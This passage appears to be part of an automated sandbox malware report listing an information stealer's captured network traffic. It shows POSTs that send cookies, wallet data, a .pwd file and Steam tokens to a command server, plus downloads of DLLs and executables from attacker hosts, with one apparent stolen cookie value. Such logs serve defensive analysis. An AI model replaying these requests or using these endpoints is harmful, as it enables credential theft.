3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"fplugins------BKECAEBGHDAEBFHIEGHI--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDBHost: 46.8.231.109Content-Length: 6063Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGHost: 46.8.231.109Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 2d 2d 0d 0a Data Ascii: ------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGDHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 2d 2d 0d 0a Data Ascii: ------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file"------KKKKEHJKFCFCBFHIIDGD--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCGIDAKECGCBGDBAFIHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 2d 2d 0d 0a Data Ascii: ------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="file"------FBFCGIDAKECGCBGDBAFI--
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: 46.8.231.109Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="message"wallets------AFBFHDBKJEGHJJJKFIIJ--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 2d 2d 0d 0a Data Ascii: ------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="message"files------CAAKKFHCFIECAAAKEGCF--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGCAAFBFBKFIDGDHJDBHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HDGCAAFBFBKFIDGDHJDBContent-Disposition: form-data; name="file"------HDGCAAFBFBKFIDGDHJDB--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="message"ybncbhylepme------EHJDHJKFIECAAKFIJJKJ--
Source: global traffic HTTP traffic detected: GET /prog/66d70775c548d_v.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d7077a2064d_l.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GCGHCBKFCFBFHIDHDBFC--
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIIJJDHDGCGDHIJDAKHost: 147.45.68.138Content-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 42 43 34 44 36 34 38 39 46 42 34 31 30 39 33 35 33 31 37 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 4a 4a 44 48 44 47 43 47 44 48 49 4a 44 41 4b 2d 2d 0d 0a Data Ascii: ------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="hwid"62BC4D6489FB4109353171-a33c7340-61ca------JDGIIJJDHDGCGDHIJDAKContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------JDGIIJJDHDGCGDHIJDAK--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIIIHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 2d 2d 0d 0a Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="mode"1------DBKEHDGDGHCBGCAKFIII--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJEHJDHJKECBFHDHDHHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 45 48 4a 44 48 4a 4b 45 43 42 46 48 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------DHIJEHJDHJKECBFHDHDHContent-Disposition: form-data; name="mode"2------DHIJEHJDHJKECBFHDHDH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJJKEHCAKFBFHJKEHCHost: 147.45.68.138Content-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 2d 2d 0d 0a Data Ascii: ------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="mode"21------HJJJJKEHCAKFBFHJKEHC--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBFHJDAAFBAKEBGIJKKHost: 147.45.68.138Content-Length: 5773Connection: Keep-AliveCache-Control: no-cache
